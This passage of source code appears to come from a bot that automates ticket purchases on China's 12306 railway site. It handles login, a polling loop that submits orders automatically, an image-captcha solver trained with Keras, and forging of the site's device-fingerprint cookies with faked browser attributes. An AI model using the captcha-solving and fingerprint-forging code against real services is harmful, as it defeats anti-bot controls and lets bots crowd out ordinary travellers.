station: :return: """ path = os.path.join(os.path.dirname(__file__), '../station_name.txt') try: with open(path, encoding="utf-8") as result: info = result.read().split('=')[1].strip("'").split('@') except Exception: with open(path) as result: info = result.read().split('=')[1].strip("'").split('@') del info[0] station_name = {} for i in range(0, len(info)): n_info = info[i].split('|') station_name[n_info[1]] = n_info[2] try: from_station = station_name[from_station.encode("utf8")] to_station = station_name[to_station.encode("utf8")] except KeyError: from_station = station_name[from_station] to_station = station_name[to_station] return from_station, to_station def call_login(self, auth=False): """ 登录回调方法 :return: """ if auth: return self.login.auth() else: configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠 self.login.go_login() def main(self): l = liftTicketInit(self) l.reqLiftTicketInit() getDrvicesID(self) self.call_login() check_user = checkUser(self) t = threading.Thread(target=check_user.sendCheckUser) t.setDaemon(True) t.start() from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION) num = 0 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES) passenger = s.sendGetPassengerDTOs() wrapcache.set("user_info", passenger, timeout=9999999) now = datetime.datetime.now() if TickerConfig.ORDER_MODEL is 1: print(f"预售还未开始,阻塞中,预售时间为{TickerConfig.OPEN_TIME}, 当前时间为: {now.strftime('%H:%M:%S')}") sleep_time_s = 0.1 sleep_time_t = 0.3 # 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案 while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME: now = datetime.datetime.now() time.sleep(0.0001) print(f"预售开始,开启时间为: {now.strftime('%H:%M:%S')}") else: sleep_time_s = TickerConfig.MIN_TIME sleep_time_t = TickerConfig.MAX_TIME while 1: try: num += 1 now = datetime.datetime.now() # 感谢群里大佬提供整点代码 configCommon.checkSleepTime(self) # 晚上到点休眠 q = query(selectObj=self, from_station=from_station, to_station=to_station, from_station_h=TickerConfig.FROM_STATION, to_station_h=TickerConfig.TO_STATION, _station_seat=self._station_seat, station_trains=TickerConfig.STATION_TRAINS, station_dates=TickerConfig.STATION_DATES, ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES), ) queryResult = q.sendQuery() # 查询接口 if queryResult.get("status"): train_no = queryResult.get("train_no", "") train_date = queryResult.get("train_date", "") stationTrainCode = queryResult.get("stationTrainCode", "") secretStr = queryResult.get("secretStr", "") secretList = queryResult.get("secretList", "") seat = queryResult.get("seat", "") leftTicket = queryResult.get("leftTicket", "") query_from_station_name = queryResult.get("query_from_station_name", "") query_to_station_name = queryResult.get("query_to_station_name", "") is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES)) if wrapcache.get(train_no): print(ticket.QUEUE_WARNING_MSG.format(train_no)) else: # 获取联系人 s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES, set_type="" if isinstance(seat, list) else seat_conf_2[seat], # 候补订单需要设置多个坐席 is_more_ticket_num=is_more_ticket_num) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList) if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get( "passengerTicketStrByAfterLate", "") self.oldPassengerStr = 
getPassengerDTOsResult.get("oldPassengerStr", "") self.set_type = getPassengerDTOsResult.get("set_type", "") # 提交订单 # 订单分为两种,一种为抢单,一种为候补订单 if secretStr: # 正常下单 if TickerConfig.ORDER_TYPE == 1: # 快速下单 a = autoSubmitOrderRequest(selectObj=self, secretStr=secretStr, train_date=train_date, passengerTicketStr=self.passengerTicketStrList, oldPassengerStr=self.oldPassengerStr, train_no=train_no, stationTrainCode=stationTrainCode, leftTicket=leftTicket, set_type=self.set_type, query_from_station_name=query_from_station_name, query_to_station_name=query_to_station_name, ) a.sendAutoSubmitOrderRequest() elif TickerConfig.ORDER_TYPE == 2: # 普通下单 sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, train_date, TickerConfig.TICKET_PEOPLES) sor.sendSubmitOrderRequest() elif secretList: # 候补订单 c = chechFace(self, secretList, train_no) c.sendChechFace() else: random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2) nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else "" print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}") time.sleep(random_time) except PassengerUserException as e: print(e) break except ticketConfigException as e: print(e) break except ticketIsExitsException as e: print(e) break except ticketNumOutException as e: print(e) break except UserPasswordException as e: print(e) break except ValueError as e: if e == "No JSON object could be decoded": print(u"12306接口无响应,正在重试") else: print(e) except KeyError as e: print(e) except TypeError as e: print(u"12306接口无响应,正在重试 {0}".format(e)) except socket.error as e: print(e) if __name__ == '__main__': s = select() cdn = s.station_table("长沙", "深圳") File: init/login.py # -*- coding=utf-8 -*- import copy import time from collections import OrderedDict from time import sleep import TickerConfig from inter.GetPassCodeNewOrderAndLogin import getPassCodeNewOrderAndLogin1 from inter.GetRandCode import getRandCode from inter.LoginAysnSuggest import loginAysnSuggest from inter.LoginConf import loginConf from myException.UserPasswordException import UserPasswordException class GoLogin: def __init__(self, session, is_auto_code, auto_code_type): self.session = session self.randCode = "" self.is_auto_code = is_auto_code self.auto_code_type = auto_code_type def auth(self): """ :return: """ self.session.httpClint.send(self.session.urls["loginInitCdn1"]) uamtkStaticUrl = self.session.urls["uamtk-static"] uamtkStaticData = {"appid": "otn"} return self.session.httpClint.send(uamtkStaticUrl, uamtkStaticData) def codeCheck(self): """ 验证码校验 :return: """ codeCheckUrl = copy.deepcopy(self.session.urls["codeCheck1"]) codeCheckUrl["req_url"] = codeCheckUrl["req_url"].format(self.randCode, int(time.time() * 1000)) fresult = self.session.httpClint.send(codeCheckUrl) if not isinstance(fresult, str): print("登录失败") return fresult = eval(fresult.split("(")[1].split(")")[0]) if "result_code" in fresult and fresult["result_code"] == "4": print(u"验证码通过,开始登录..") return True else: if "result_message" in fresult: print(fresult["result_message"]) sleep(1) self.session.httpClint.del_cookies() def baseLogin(self, user, passwd): """ 登录过程 :param user: :param passwd: :return: 权限校验码 """ logurl = self.session.urls["login"] loginData = OrderedDict() loginData["username"] = user, loginData["password"] = passwd, 
loginData["appid"] = "otn", loginData["answer"] = self.randCode, tresult = self.session.httpClint.send(logurl, loginData) if 'result_code' in tresult and tresult["result_code"] == 0: print(u"登录成功") tk = self.auth() if "newapptk" in tk and tk["newapptk"]: return tk["newapptk"] else: return False elif 'result_message' in tresult and tresult['result_message']: messages = tresult['result_message'] if messages.find(u"密码输入错误") is not -1: raise UserPasswordException("{0}".format(messages)) else: print(u"登录失败: {0}".format(messages)) print(u"尝试重新登陆") return False else: return False def getUserName(self, uamtk): """ 登录成功后,显示用户名 :return: """ if not uamtk: return u"权限校验码不能为空" else: uamauthclientUrl = self.session.urls["uamauthclient"] data = {"tk": uamtk} uamauthclientResult = self.session.httpClint.send(uamauthclientUrl, data) if uamauthclientResult: if "result_code" in uamauthclientResult and uamauthclientResult["result_code"] == 0: print(u"欢迎 {} 登录".format(uamauthclientResult["username"])) return True else: return False else: self.session.httpClint.send(uamauthclientUrl, data) url = self.session.urls["getUserInfo"] self.session.httpClint.send(url) def go_login(self): """ 登陆 :param user: 账户名 :param passwd: 密码 :return: """ user, passwd = TickerConfig.USER, TickerConfig.PWD if not user or not passwd: raise UserPasswordException(u"温馨提示: 用户名或者密码为空,请仔细检查") login_num = 0 while True: if loginConf(self.session): result = getPassCodeNewOrderAndLogin1(session=self.session, imgType="login") if not result: continue self.randCode = getRandCode(self.is_auto_code, self.auto_code_type, result) print(self.randCode) login_num += 1 self.auth() if self.codeCheck(): uamtk = self.baseLogin(user, passwd) if uamtk: self.getUserName(uamtk) break else: loginAysnSuggest(self.session, username=user, password=passwd) login_num += 1 break File: verify/mlearn_for_image.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import sys import cv2 import numpy as np from keras import models from keras import layers from keras import optimizers from keras.applications import VGG16 from keras.callbacks import ReduceLROnPlateau from keras.preprocessing.image import ImageDataGenerator def preprocess_input(x): x = x.astype('float32') # 我是用cv2来读取的图片,其已经是BGR格式了 mean = [103.939, 116.779, 123.68] x -= mean return x def load_data(): # 这是统计学专家提供的训练集 data = np.load('captcha.npz') train_x, train_y = data['images'], data['labels'] train_x = preprocess_input(train_x) # 由于是统计得来的信息,所以在此给定可信度 sample_weight = train_y.max(axis=1) / np.sqrt(train_y.sum(axis=1)) sample_weight /= sample_weight.mean() train_y = train_y.argmax(axis=1) # 这是人工提供的验证集 data = np.load('captcha.test.npz') test_x, test_y = data['images'], data['labels'] test_x = preprocess_input(test_x) return (train_x, train_y, sample_weight), (test_x, test_y) def learn(): (train_x, train_y, sample_weight), (test_x, test_y) = load_data() datagen = ImageDataGenerator(horizontal_flip=True, vertical_flip=True) train_generator = datagen.flow(train_x, train_y, sample_weight=sample_weight) base = VGG16(weights='imagenet', include_top=False, input_shape=(None, None, 3)) for layer in base.layers[:-4]: layer.trainable = False model = models.Sequential([ base, layers.BatchNormalization(), layers.Conv2D(64, (3, 3), activation='relu', padding='same'), layers.GlobalAveragePooling2D(), layers.BatchNormalization(), layers.Dense(64, activation='relu'), layers.BatchNormalization(), layers.Dropout(0.20), layers.Dense(80, activation='softmax') ]) 
model.compile(optimizer=optimizers.RMSprop(lr=1e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy']) model.summary() reduce_lr = ReduceLROnPlateau(verbose=1) model.fit_generator(train_generator, epochs=400, steps_per_epoch=100, validation_data=(test_x[:800], test_y[:800]), callbacks=[reduce_lr]) result = model.evaluate(test_x, test_y) print(result) model.save('12306.image.model.h5', include_optimizer=False) def predict(imgs): imgs = preprocess_input(imgs) model = models.load_model('12306.image.model.h5') labels = model.predict(imgs) return labels def _predict(fn): imgs = cv2.imread(fn) imgs = cv2.resize(imgs, (67, 67)) imgs.shape = (-1, 67, 67, 3) labels = predict(imgs) print(labels.max(axis=1)) print(labels.argmax(axis=1)) if __name__ == '__main__': if len(sys.argv) >= 2: _predict(sys.argv[1]) else: learn() File: verify/pretreatment.py #! env python # coding: utf-8 # 功能:对图像进行预处理,将文字部分单独提取出来 # 并存放到ocr目录下 # 文件名为原验证码文件的文件名 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import hashlib import os import pathlib import cv2 import numpy as np import requests import scipy.fftpack PATH = 'imgs' def download_image(): # 抓取验证码 # 存放到指定path下 # 文件名为图像的MD5 url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand' r = requests.get(url) fn = hashlib.md5(r.content).hexdigest() with open(f'{PATH}/{fn}.jpg', 'wb') as fp: fp.write(r.content) def download_images(): pathlib.Path(PATH).mkdir(exist_ok=True) for idx in range(40000): download_image() print(idx) def get_text(img, offset=0): # 得到图像中的文本部分 return img[3:22, 120 + offset:177 + offset] def avhash(im): im = cv2.resize(im, (8, 8), interpolation=cv2.INTER_CUBIC) avg = im.mean() im = im > avg im = np.packbits(im) return im def phash(im): im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_CUBIC) im = scipy.fftpack.dct(scipy.fftpack.dct(im, axis=0), axis=1) im = im[:8, :8] med = np.median(im) im = im > med im = np.packbits(im) return im def _get_imgs(img): interval = 5 length = 67 for x in range(40, img.shape[0] - length, interval + length): for y in range(interval, img.shape[1] - length, interval + length): yield img[x:x + length, y:y + length] def get_imgs(img): imgs = [] for img in _get_imgs(img): imgs.append(phash(img)) return imgs def pretreat(): if not os.path.isdir(PATH): download_images() texts, imgs = [], [] for img in os.listdir(PATH): img = os.path.join(PATH, img) img = cv2.imread(img, cv2.IMREAD_GRAYSCALE) texts.append(get_text(img)) imgs.append(get_imgs(img)) return texts, imgs def load_data(path='data.npz'): if not os.path.isfile(path): texts, imgs = pretreat() np.savez(path, texts=texts, images=imgs) f = np.load(path) return f['texts'], f['images'] if __name__ == '__main__': texts, imgs = load_data() print(texts.shape) print(imgs.shape) imgs = imgs.reshape(-1, 8) print(np.unique(imgs, axis=0).shape) File: verify/__init__.py File: verify/localVerifyCode.py # coding: utf-8 import TickerConfig if TickerConfig.AUTO_CODE_TYPE == 2: import base64 import os import cv2 import numpy as np from keras import models, backend import tensorflow as tf from verify import pretreatment from verify.mlearn_for_image import preprocess_input graph = tf.get_default_graph() PATH = lambda p: os.path.abspath( os.path.join(os.path.dirname(__file__), p) ) TEXT_MODEL = "" IMG_MODEL = "" def get_text(img, offset=0): text = pretreatment.get_text(img, offset) text = cv2.cvtColor(text, cv2.COLOR_BGR2GRAY) text = text / 255.0 h, w = text.shape text.shape = (1, h, w, 1) return text def base64_to_image(base64_code): # base64解码 
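    # The statements below turn the base64 captcha returned by 12306 into an OpenCV image:
    # base64 string -> raw bytes (b64decode) -> flat uint8 buffer (np.fromstring)
    # -> decoded OpenCV image (cv2.imdecode); Verify.verify() then runs get_text() and
    # pretreatment._get_imgs() on the result.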
img_data = base64.b64decode(base64_code) # 转换为np数组 img_array = np.fromstring(img_data, np.uint8) # 转换成opencv可用格式 img = cv2.imdecode(img_array, cv2.COLOR_RGB2BGR) return img class Verify: def __init__(self): self.textModel = "" self.imgModel = "" self.loadImgModel() self.loadTextModel() def loadTextModel(self): if not self.textModel: self.textModel = models.load_model(PATH('../model.v2.0.h5')) else: print("无需加载模型model.v2.0.h5") def loadImgModel(self): if not self.imgModel: self.imgModel = models.load_model(PATH('../12306.image.model.h5')) def verify(self, fn): verify_titles = ['打字机', '调色板', '跑步机', '毛线', '老虎', '安全帽', '沙包', '盘子', '本子', '药片', '双面胶', '龙舟', '红酒', '拖把', '卷尺', '海苔', '红豆', '黑板', '热水袋', '烛台', '钟表', '路灯', '沙拉', '海报', '公交卡', '樱桃', '创可贴', '牌坊', '苍蝇拍', '高压锅', '电线', '网球拍', '海鸥', '风铃', '订书机', '冰箱', '话梅', '排风机', '锅铲', '绿豆', '航母', '电子秤', '红枣', '金字塔', '鞭炮', '菠萝', '开瓶器', '电饭煲', '仪表盘', '棉棒', '篮球', '狮子', '蚂蚁', '蜡烛', '茶盅', '印章', '茶几', '啤酒', '档案袋', '挂钟', '刺绣', '铃铛', '护腕', '手掌印', '锦旗', '文具盒', '辣椒酱', '耳塞', '中国结', '蜥蜴', '剪纸', '漏斗', '锣', '蒸笼', '珊瑚', '雨靴', '薯条', '蜜蜂', '日历', '口哨'] # 读取并预处理验证码 img = base64_to_image(fn) text = get_text(img) imgs = np.array(list(pretreatment._get_imgs(img))) imgs = preprocess_input(imgs) text_list = [] # 识别文字 self.loadTextModel() global graph with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) # 获取下一个词 # 根据第一个词的长度来定位第二个词的位置 if len(text) == 1: offset = 27 elif len(text) == 2: offset = 47 else: offset = 60 text = get_text(img, offset=offset) if text.mean() < 0.95: with graph.as_default(): label = self.textModel.predict(text) label = label.argmax() text = verify_titles[label] text_list.append(text) print("题目为{}".format(text_list)) # 加载图片分类器 self.loadImgModel() with graph.as_default(): labels = self.imgModel.predict(imgs) labels = labels.argmax(axis=1) results = [] for pos, label in enumerate(labels): l = verify_titles[label] print(pos + 1, l) if l in text_list: results.append(str(pos + 1)) return results if __name__ == '__main__': pass # verify("verify-img1.jpeg") File: config/emailConf.py # -*- coding: utf8 -*- import socket __author__ = 'MR.wen' import TickerConfig from email.header import Header from email.mime.text import MIMEText import smtplib def sendEmail(msg): """ 邮件通知 :param str: email content :return: """ try: if TickerConfig.EMAIL_CONF["IS_MAIL"]: sender = TickerConfig.EMAIL_CONF["email"] receiver = TickerConfig.EMAIL_CONF["notice_email_list"] subject = '恭喜,您已订票成功' username = TickerConfig.EMAIL_CONF["username"] password = TickerConfig.EMAIL_CONF["password"] host = TickerConfig.EMAIL_CONF["host"] s = "{0}".format(msg) msg = MIMEText(s, 'plain', 'utf-8') # 中文需参数‘utf-8’,单字节字符不需要 msg['Subject'] = Header(subject, 'utf-8') msg['From'] = sender msg['To'] = receiver try: smtp = smtplib.SMTP_SSL(host) smtp.connect(host) except socket.error: smtp = smtplib.SMTP() smtp.connect(host) smtp.connect(host) smtp.login(username, password) smtp.sendmail(sender, receiver.split(","), msg.as_string()) smtp.quit() print(u"邮件已通知, 请查收") except Exception as e: print(u"邮件配置有误{}".format(e)) if __name__ == '__main__': sendEmail(1) File: config/pushbearConf.py # -*- coding: utf8 -*- import TickerConfig from config.urlConf import urls from myUrllib.httpUtils import HTTPClient PUSH_BEAR_API_PATH = "https://pushbear.ftqq.com/sub" def sendPushBear(msg): """ pushBear微信通知 :param str: 通知内容 content :return: """ if TickerConfig.PUSHBEAR_CONF["is_pushbear"] and TickerConfig.PUSHBEAR_CONF["send_key"].strip() != "": try: 
sendPushBearUrls = urls.get("Pushbear") data = { "sendkey": TickerConfig.PUSHBEAR_CONF["send_key"].strip(), "text": "易行购票成功通知", "desp": msg } httpClint = HTTPClient(0) sendPushBeaRsp = httpClint.send(sendPushBearUrls, data=data) if sendPushBeaRsp.get("code") is 0: print(u"已下发 pushbear 微信通知, 请查收") else: print(sendPushBeaRsp) except Exception as e: print(u"pushbear 配置有误 {}".format(e)) else: pass if __name__ == '__main__': sendPushBear(1) File: config/__init__.py File: config/logger.py #coding: utf-8 import os import time import logging from config import configCommon logger = None loggerHandler = None dateStr = '' #默认拥有日期后缀 suffix = '' #除了日期外的后缀 def setSuffix(s): global suffix suffix = s def getTodayDateStr(): return time.strftime("%Y-%m-%d", time.localtime(configCommon.getNowTimestamp())) def setDateStr(s): global dateStr dateStr = s def isAnotherDay(s): global dateStr return dateStr != s def getLogFile(): global dateStr, suffix rtn = os.path.join(configCommon.getLogDir(), dateStr) if suffix: rtn += "_" + suffix return rtn + ".log" def log(msg, func = "info"): global logger if not logger: logger = logging.getLogger() logger.setLevel(logging.INFO) todayStr = getTodayDateStr() if isAnotherDay(todayStr): setDateStr(todayStr) logger.removeHandler(loggerHandler) fh = logging.FileHandler(getLogFile()) fm = logging.Formatter(u'[%(asctime)s][%(levelname)8s] --- %(message)s (%(filename)s:%(lineno)s)') fh.setFormatter(fm) logger.addHandler(fh) levels = { "debug": logger.debug, "info": logger.info, "warning": logger.warning, "error": logger.error, "critical": logger.critical } levels[func](msg) File: config/configCommon.py # -*- coding: utf-8 -*- import datetime import os import random import sys import time from myException.ticketConfigException import ticketConfigException rushRefreshMinTimeIntval = 2000 rushRefreshMaxTimeIntval = 3600000 rushRefreshTimeIntval = 100 # 最早运行时间 maxRunTime = 6 # 程序停止时间 maxRunStopTime = 23 # 可售天数 maxDate = 29 RS_SUC = 0 RS_TIMEOUT = 1 RS_JSON_ERROR = 2 RS_OTHER_ERROR = 3 seat_conf = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '软座': 24, '硬座': 29, '无座': 26, '动卧': 33, } if sys.version_info.major == 2: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.iteritems()]) else: seat_conf_2 = dict([(v, k) for (k, v) in seat_conf.items()]) def getNowTimestamp(): return time.time() def decMakeDir(func): def handleFunc(*args, **kwargs): dirname = func(*args, **kwargs) if not os.path.exists(dirname): os.makedirs(dirname) elif not os.path.isdir(dirname): pass return dirname return func def getWorkDir(): return os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # # def fileOpen(path): # """ # 文件读取兼容2和3 # :param path: 文件读取路径 # :return: # """ # try: # with open(path, "r", ) as f: # return f # except TypeError: # with open(path, "r", ) as f: # return f @decMakeDir def getTmpDir(): return os.path.join(getWorkDir(), "tmp") @decMakeDir def getLogDir(): return os.path.join(getTmpDir(), "log") @decMakeDir def getCacheDir(): return os.path.join(getTmpDir(), "cache") @decMakeDir def getVCodeDir(): return os.path.join(getTmpDir(), "vcode") def getVCodeImageFile(imageName): return os.path.join(getVCodeDir(), imageName + ".jpg") def getCacheFile(cacheType): return os.path.join(getCacheDir(), cacheType + ".cache") def checkSleepTime(session): now = datetime.datetime.now() if now.hour >= maxRunStopTime or now.hour < maxRunTime: print(u"12306休息时间,本程序自动停止,明天早上六点将自动运行") open_time = datetime.datetime(now.year, now.month, now.day, maxRunTime) if open_time < now: open_time += 
datetime.timedelta(1) time.sleep((open_time - now).seconds + round(random.uniform(1, 10))) session.call_login() def checkDate(station_dates): """ 检查日期是否合法 :param station_dates: :return: """ today = datetime.datetime.now() maxDay = (today + datetime.timedelta(maxDate)).strftime("%Y-%m-%d") for station_date in station_dates[::-1]: date = datetime.datetime.strftime(datetime.datetime.strptime(station_date, "%Y-%m-%d"), "%Y-%m-%d") if date < today.strftime("%Y-%m-%d") or date > maxDay: print(u"警告:当前时间配置有小于当前时间或者大于最大时间: {}, 已自动忽略".format(station_date)) station_dates.remove(station_date) if not station_dates: print(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") raise ticketConfigException(u"当前日期设置无符合查询条件的,已被全部删除,请查证后添加!!!") else: station_dates[station_dates.index(station_date)] = date return station_dates File: config/AutoSynchroTime.py # coding=utf-8 import os import platform import ntplib import datetime def autoSynchroTime(): """ 同步北京时间,执行时候,请务必用sudo,sudo,sudo 执行,否则会报权限错误,windows打开ide或者cmd请用管理员身份 :return: """ c = ntplib.NTPClient() hosts = ['ntp1.aliyun.com', 'ntp2.aliyun.com', 'ntp3.aliyun.com', 'ntp4.aliyun.com', 'cn.pool.ntp.org'] print(u"正在同步时间,请耐心等待30秒左右,如果下面有错误发送,可以忽略!!") print(u"系统当前时间{}".format(str(datetime.datetime.now())[:22])) system = platform.system() if system == "Windows": # windows 同步时间未测试过,参考地址:https://www.jianshu.com/p/92ec15da6cc3 for host in hosts: os.popen('w32tm /register') os.popen('net start w32time') os.popen('w32tm /config /manualpeerlist:"{}" /syncfromflags:manual /reliable:yes /update'.format(host)) os.popen('ping -n 3 127.0.0.1 >nul') sin = os.popen('w32tm /resync') if sin is 0: break else: # mac同步地址,如果ntpdate未安装,brew install ntpdate linux 安装 yum install -y ntpdate for host in hosts: sin = os.popen('ntpdate {}'.format(host)) if sin is 0: break print(u"同步后时间:{}".format(str(datetime.datetime.now())[:22])) if __name__ == '__main__': autoSynchroTime() File: config/getCookie.py import json import random import re import time import os import TickerConfig from config.urlConf import urls def getDrvicesID(session): """ :return: """ print("cookie获取中") if TickerConfig.COOKIE_TYPE is 1: from selenium import webdriver cookies = [] # 解决放镜像里 DevToolsActivePort file doesn't exist的问题 options = webdriver.ChromeOptions() if os.name != 'nt' and TickerConfig.CHROME_CHROME_PATH: options = webdriver.ChromeOptions() options.binary_location = TickerConfig.CHROME_CHROME_PATH options.add_argument( '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36') options.add_argument("--no-sandbox") options.add_argument("--headless") driver = webdriver.Chrome(executable_path=TickerConfig.CHROME_PATH,chrome_options=options) driver.get("https://www.12306.cn/index/index.html") time.sleep(10) for c in driver.get_cookies(): cookie = dict() print() if c.get("name") == "RAIL_DEVICEID" or c.get("name") == "RAIL_EXPIRATION": cookie[c.get("name")] = c.get("value") cookies.append(cookie) print(f"获取cookie: {cookies}") if cookies: session.httpClint.set_cookies(cookies) session.cookies = cookies print("cookie获取完成") elif TickerConfig.COOKIE_TYPE is 2: request_device_id(session) elif TickerConfig.COOKIE_TYPE is 3: # RAIL_DEVICEID,RAIL_EXPIRATION的值打开12306官网可以获取headers-Cookies if not TickerConfig.RAIL_DEVICEID or not TickerConfig.RAIL_EXPIRATION: print("警告!!: RAIL_DEVICEID,RAIL_EXPIRATION的值为空,请手动打开12306官网可以获取headers-Cookies中的RAIL_DEVICEID,RAIL_EXPIRATION,填入配置文件中") cookies = [{ "RAIL_DEVICEID": TickerConfig.RAIL_DEVICEID, "RAIL_EXPIRATION": 
TickerConfig.RAIL_EXPIRATION, }] session.httpClint.set_cookies(cookies) session.cookies = cookies def request_device_id(session): """ 获取加密后的浏览器特征 ID :return: """ params = {"algID": request_alg_id(session), "timestamp": int(time.time() * 1000)} params = dict(params, **_get_hash_code_params()) response = session.httpClint.send(urls.get("getDevicesId"), params=params) if response.find('callbackFunction') >= 0: result = response[18:-2] try: result = json.loads(result) session.httpClint.set_cookies([{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }]) session.cookies = [{ 'RAIL_EXPIRATION': result.get('exp'), 'RAIL_DEVICEID': result.get('dfp'), }] except: return False def request_alg_id(session): response = session.httpClint.send(urls.get("GetJS")) result = re.search(r'algID\\x3d(.*?)\\x26', response) try: return result.group(1) except (IndexError, AttributeError) as e: pass return "" def _get_hash_code_params(): from collections import OrderedDict data = { 'adblock': '0', 'browserLanguage': 'en-US', 'cookieEnabled': '1', 'custID': '133', 'doNotTrack': 'unknown', 'flashVersion': '0', 'javaEnabled': '0', 'jsFonts': 'c227b88b01f5c513710d4b9f16a5ce52', 'localCode': '3232236206', 'mimeTypes': '52d67b2a5aa5e031084733d5006cc664', 'os': 'MacIntel', 'platform': 'WEB', 'plugins': 'd22ca0b81584fbea62237b14bd04c866', 'scrAvailSize': str(random.randint(500, 1000)) + 'x1920', 'srcScreenSize': '24xx1080x1920', 'storeDb': 'i1l1o1s1', 'timeZone': '-8', 'touchSupport': '99115dfb07133750ba677d055874de87', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( random.randint( 5000, 7000)) + '.0 Safari/537.36', 'webSmartID': 'f4e3b7b14cc647e30a6267028ad54c56', } data_trans = { 'browserVersion': 'd435', 'touchSupport': 'wNLf', 'systemLanguage': 'e6OK', 'scrWidth': 'ssI5', 'openDatabase': 'V8vl', 'scrAvailSize': 'TeRS', 'hasLiedResolution': '3neK', 'hasLiedOs': 'ci5c', 'timeZone': 'q5aJ', 'userAgent': '0aew', 'userLanguage': 'hLzX', 'jsFonts': 'EOQP', 'scrAvailHeight': '88tV', 'browserName': '-UVA', 'cookieCode': 'VySQ', 'online': '9vyE', 'scrAvailWidth': 'E-lJ', 'flashVersion': 'dzuS', 'scrDeviceXDPI': '3jCe', 'srcScreenSize': 'tOHY', 'storeDb': 'Fvje', 'doNotTrack': 'VEek', 'mimeTypes': 'jp76', 'sessionStorage': 'HVia', 'cookieEnabled': 'VPIf', 'os': 'hAqN', 'hasLiedLanguages': 'j5po', 'hasLiedBrowser': '2xC5', 'webSmartID': 'E3gR', 'appcodeName': 'qT7b', 'javaEnabled': 'yD16', 'plugins': 'ks0Q', 'appMinorVersion': 'qBVW', 'cpuClass': 'Md7A', 'indexedDb': '3sw-', 'adblock': 'FMQw', 'localCode': 'lEnu', 'browserLanguage': 'q4f3', 'scrHeight': '5Jwy', 'localStorage': 'XM7l', 'historyList': 'kU5z', 'scrColorDepth': "qmyu" } data = OrderedDict(data) d = '' params = {} for key, item in data.items(): d += key + item key = data_trans[key] if key in data_trans else key params[key] = item d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[d_f:2 * d_f] + d[2 * d_f:d_len] + d[0: d_f] d_len = len(d) d_f = int(d_len / 3) if d_len % 3 == 0 else int(d_len / 3) + 1 if d_len >= 3: d = d[2 * d_f:d_len] + d[0: d_f] + d[1 * d_f: 2 * d_f] d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) d = _encode_data_str_v2(d) data_str = _encode_string(d) params['hashCode'] = data_str return params def _encode_data_str_v2(d): b = len(d) if b % 2 == 0: return d[b // 2: b] + d[0:b // 2] else: return d[b // 2 + 1:b] + d[b // 2] + d[0:b // 2] def _encode_string(str): import hashlib import base64 result = 
base64.b64encode(hashlib.sha256(str.encode()).digest()).decode() return result.replace('+', '-').replace('/', '_').replace('=', '') File: config/TicketEnmu.py # coding=utf-8 from enum import Enum class ticket(object): QUERY_C = u"查询到有余票,尝试提交订单" QUERY_IN_BLACK_LIST = u"该车次{} 正在被关小黑屋,跳过此车次" SUCCESS_CODE = 000000 FAIL_CODE = 999999 AUTO_SUBMIT_ORDER_REQUEST_C = u"提交订单成功" AUTO_SUBMIT_ORDER_REQUEST_F = u"提交订单失败,重新刷票中" AUTO_SUBMIT_NEED_CODE = u"需要验证码" AUTO_SUBMIT_NOT_NEED_CODE = u"不需要验证码" TICKET_BLACK_LIST_TIME = 5 # 加入小黑屋的等待时间,默认5 min DTO_NOT_FOUND = u"未查找到常用联系人, 请查证后添加!!" DTO_NOT_IN_LIST = u"联系人不在列表中,请查证后添加!!" QUEUE_TICKET_SHORT = u"当前余票数小于乘车人数,放弃订票" QUEUE_TICKET_SUCCESS = u"排队成功, 当前余票还剩余: {0}张" QUEUE_JOIN_BLACK = u"排队发现未知错误{0},将此列车 {1}加入小黑屋" QUEUE_WARNING_MSG = u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋" OUT_NUM = 120 # 排队请求12306的次数 WAIT_OUT_NUM = u"超出排队时间,自动放弃,正在重新刷票" WAIT_ORDER_SUCCESS = u"恭喜您订票成功,订单号为:{0}, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付!" WAIT_AFTER_NATE_SUCCESS = u"候补订单已完成,请立即打开浏览器登录12306,访问‘候补订单’,在30分钟内完成支付!" WAIT_ORDER_CONTINUE = 